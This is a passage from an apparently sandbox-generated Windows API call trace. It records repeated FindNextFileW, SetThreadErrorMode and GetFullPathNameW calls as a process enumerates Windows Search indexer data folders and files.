ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.000", cAlternateFileName="")) returned 1 [0252.634] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.001", cAlternateFileName="")) returned 1 [0252.634] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.002", cAlternateFileName="")) returned 1 [0252.634] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETTINGS.DIA", cAlternateFileName="")) returned 1 [0252.634] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.634] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.642] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.001", lpFilePart=0x0) returned 0x6f [0252.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0252.654] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.654] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.655] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.655] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0252.655] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 0 [0252.655] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.Crwl", cAlternateFileName="SYSTEM~1.CRW")) returned 1 [0252.660] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.gthr", cAlternateFileName="SYSTEM~1.GTH")) returned 1 [0252.660] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.gthr", cAlternateFileName="SYSTEM~1.GTH")) returned 0 [0252.660] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.660] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.Crwl", cAlternateFileName="SYSTEM~1.CRW")) returned 1 [0252.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.gthr", cAlternateFileName="SYSTEM~1.GTH")) returned 1 [0252.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.661] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0252.663] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.664] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0252.664] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.664] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.664] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outbound", cAlternateFileName="")) returned 1 [0252.665] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5ad6e40, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0252.665] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0252.665] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5c07940, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0252.665] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.665] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.665] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: 